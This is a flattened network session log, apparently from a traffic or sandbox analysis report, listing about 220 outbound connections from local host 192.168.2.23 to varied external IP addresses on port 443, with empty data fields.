                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17681192.168.2.2358058115.114.148.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17682192.168.2.234627018.127.71.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17683192.168.2.2356258108.49.9.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17684192.168.2.23567402.46.225.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17685192.168.2.2351658173.183.239.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17686192.168.2.2351672132.65.50.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17687192.168.2.235048025.236.235.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17688192.168.2.2344500219.150.0.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17689192.168.2.2360954144.199.187.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17690192.168.2.23350084.5.30.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17691192.168.2.2357254100.29.62.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17692192.168.2.234219080.105.128.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17693192.168.2.2347854204.83.230.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17694192.168.2.234670063.185.150.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17695192.168.2.2341080177.57.204.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17696192.168.2.2334376102.155.116.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17697192.168.2.2340998221.199.225.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17698192.168.2.233708641.24.193.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17699192.168.2.234548024.186.239.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17700192.168.2.2351786134.220.116.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17701192.168.2.2347626209.17.190.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17702192.168.2.2333994162.210.31.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17703192.168.2.2354884210.127.13.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17704192.168.2.2346930119.67.232.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17705192.168.2.2355858205.179.81.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17706192.168.2.2338622117.239.186.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17707192.168.2.2353780143.106.52.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17708192.168.2.2355598154.82.73.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17709192.168.2.2353898146.207.59.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17710192.168.2.2344212118.14.224.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17711192.168.2.233734813.46.2.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17712192.168.2.2350864132.86.90.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17713192.168.2.2339748144.142.42.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17714192.168.2.2334976121.127.39.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17715192.168.2.2340092107.199.140.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17716192.168.2.2336540114.169.225.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17717192.168.2.235655880.254.132.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17718192.168.2.234984050.142.25.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17719192.168.2.2336014166.34.23.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17720192.168.2.234021692.36.166.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17721192.168.2.2347196124.113.154.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17722192.168.2.2343698158.25.218.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17723192.168.2.2333480161.104.27.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17724192.168.2.234798014.213.28.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17725192.168.2.233714444.126.105.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17726192.168.2.2335534204.168.230.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17727192.168.2.2333914210.118.253.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17728192.168.2.235860292.168.71.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17729192.168.2.233348243.42.69.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17730192.168.2.2348568222.71.170.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17731192.168.2.2357602133.69.14.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17732192.168.2.234462065.165.217.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17733192.168.2.2360044102.116.132.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17734192.168.2.2334988189.11.228.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17735192.168.2.2349784166.232.196.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17736192.168.2.2336642131.17.20.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17737192.168.2.2350042205.183.106.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17738192.168.2.2335734217.134.254.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17739192.168.2.2351304223.117.29.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17740192.168.2.23389188.185.34.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17741192.168.2.234043687.12.69.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17742192.168.2.234169491.253.124.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17743192.168.2.234807852.169.236.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17744192.168.2.2333462128.78.126.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17745192.168.2.2336716175.136.147.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17746192.168.2.234481043.152.103.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17747192.168.2.234894867.207.231.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17748192.168.2.233474088.1.106.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17749192.168.2.2336524146.48.165.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17750192.168.2.2344930217.144.108.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17751192.168.2.233420298.123.55.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17752192.168.2.2340134156.91.156.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17753192.168.2.2336690139.109.177.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17754192.168.2.234071696.160.79.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17755192.168.2.233707243.39.246.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17756192.168.2.233866072.180.54.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17757192.168.2.2333740140.86.240.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17758192.168.2.2337256109.115.238.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17759192.168.2.235368687.24.255.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17760192.168.2.234264265.155.40.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17761192.168.2.233961277.198.124.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17762192.168.2.2356454130.211.169.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17763192.168.2.2333940131.5.223.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17764192.168.2.234268286.113.202.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17765192.168.2.2344130204.43.136.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17766192.168.2.2353618101.56.149.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17767192.168.2.23595542.134.111.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17768192.168.2.233511662.210.134.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17769192.168.2.2346408165.39.231.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17770192.168.2.233861488.114.27.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17771192.168.2.235115642.107.87.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17772192.168.2.2339250150.42.115.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17773192.168.2.2352518216.225.25.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17774192.168.2.234282261.114.108.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17775192.168.2.2334694205.237.15.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17776192.168.2.235790499.238.123.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17777192.168.2.234368612.28.190.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17778192.168.2.2354714222.47.127.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17779192.168.2.2333688107.12.128.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17780192.168.2.2349838207.104.50.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17781192.168.2.2352426118.114.21.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17782192.168.2.2356586178.101.89.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17783192.168.2.235166690.121.65.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17784192.168.2.2356202108.253.254.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17785192.168.2.2355780207.228.51.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17786192.168.2.233650284.235.178.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17787192.168.2.2339370102.124.25.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17788192.168.2.2333358185.57.164.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17789192.168.2.235899895.95.1.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17790192.168.2.2348380121.78.219.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17791192.168.2.2334628153.63.110.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17792192.168.2.235433266.222.172.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17793192.168.2.23379602.15.105.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17794192.168.2.233833043.91.56.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17795192.168.2.235007291.30.19.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17796192.168.2.2337050124.196.203.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17797192.168.2.235404696.176.104.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17798192.168.2.2345236118.168.235.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17799192.168.2.2344288194.143.164.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17800192.168.2.233871299.39.51.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17801192.168.2.2339702188.175.188.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17802192.168.2.23545701.4.24.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17803192.168.2.235643078.195.97.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17804192.168.2.2333702164.4.87.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17805192.168.2.2358672144.216.155.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17806192.168.2.233293463.20.54.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17807192.168.2.2353966184.83.156.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17808192.168.2.2347790162.22.234.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17809192.168.2.2337564166.4.84.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17810192.168.2.236022484.184.245.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17811192.168.2.2346000115.61.67.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17812192.168.2.235120614.82.53.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17813192.168.2.234175635.159.241.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17814192.168.2.233809661.167.85.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17815192.168.2.2338342104.121.15.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17816192.168.2.233598672.130.210.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17817192.168.2.235925418.13.84.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17818192.168.2.235428273.115.197.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17819192.168.2.2341576158.19.224.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17820192.168.2.2349562188.218.45.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17821192.168.2.234079466.255.112.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17822192.168.2.235356264.193.176.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17823192.168.2.2343394211.12.189.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17824192.168.2.2334356125.220.42.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17825192.168.2.2342108165.245.156.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17826192.168.2.2338986220.242.213.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17827192.168.2.2334640108.224.10.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17828192.168.2.234524477.35.50.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17829192.168.2.2345374154.244.168.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17830192.168.2.234267024.33.177.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17831192.168.2.234144014.119.216.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17832192.168.2.235317854.94.19.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17833192.168.2.2345648115.137.189.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17834192.168.2.235334420.138.94.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17835192.168.2.235012087.117.48.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17836192.168.2.235178052.217.250.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17837192.168.2.2333334102.136.62.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17838192.168.2.2339814144.154.75.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17839192.168.2.2348426142.221.214.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17840192.168.2.2333976166.161.9.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17841192.168.2.2345274114.69.85.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17842192.168.2.2337650211.89.190.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17843192.168.2.2354824206.37.78.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17844192.168.2.233988689.17.89.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17845192.168.2.2334794103.181.107.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17846192.168.2.2350990201.144.243.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17847192.168.2.2355424207.8.164.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17848192.168.2.234422850.183.74.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17849192.168.2.235778432.116.121.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17850192.168.2.2357494117.234.49.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17851192.168.2.2343250188.123.171.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17852192.168.2.2339060162.48.36.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17853192.168.2.234228890.8.214.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17854192.168.2.2355692123.148.137.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17855192.168.2.236025217.25.142.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17856192.168.2.235480295.244.43.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17857192.168.2.2357152209.24.148.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17858192.168.2.234857882.229.141.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17859192.168.2.2356190191.207.182.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17860192.168.2.2352716107.75.111.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17861192.168.2.2360764118.101.20.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17862192.168.2.2340466209.90.42.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17863192.168.2.2354690131.253.217.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17864192.168.2.234397025.207.3.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17865192.168.2.2354774198.101.234.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17866192.168.2.234359818.4.251.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17867192.168.2.2341382144.28.146.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17868192.168.2.234626652.229.164.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17869192.168.2.2335636199.219.25.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17870192.168.2.2337506139.158.38.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17871192.168.2.233955267.167.53.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17872192.168.2.233301846.216.31.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17873192.168.2.234628477.201.17.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17874192.168.2.2359648175.226.35.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17875192.168.2.233599039.101.245.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17876192.168.2.2348310170.174.253.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17877192.168.2.2343492201.173.238.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17878192.168.2.234442218.150.138.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17879192.168.2.2336222122.118.85.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17880192.168.2.235275480.198.122.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17881192.168.2.2349070197.221.2.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17882192.168.2.2352652190.134.4.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17883192.168.2.234664283.17.175.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17884192.168.2.233730412.153.171.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17885192.168.2.2338032200.86.235.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17886192.168.2.234514696.96.187.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17887192.168.2.233517023.248.188.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17888192.168.2.2350188122.17.225.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17889192.168.2.234924665.222.74.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17890192.168.2.2354094184.183.80.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17891192.168.2.234473242.53.55.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17892192.168.2.2360888148.58.207.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17893192.168.2.2349750176.238.175.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17894192.168.2.2336424129.255.121.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17895192.168.2.2350528162.210.121.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17896192.168.2.2336392176.181.114.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17897192.168.2.2357432200.63.98.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17898192.168.2.234493472.141.254.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17899192.168.2.2335974117.133.231.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17900192.168.2.2333764108.61.211.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17901192.168.2.233792075.203.130.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17902192.168.2.2333464160.103.154.25443
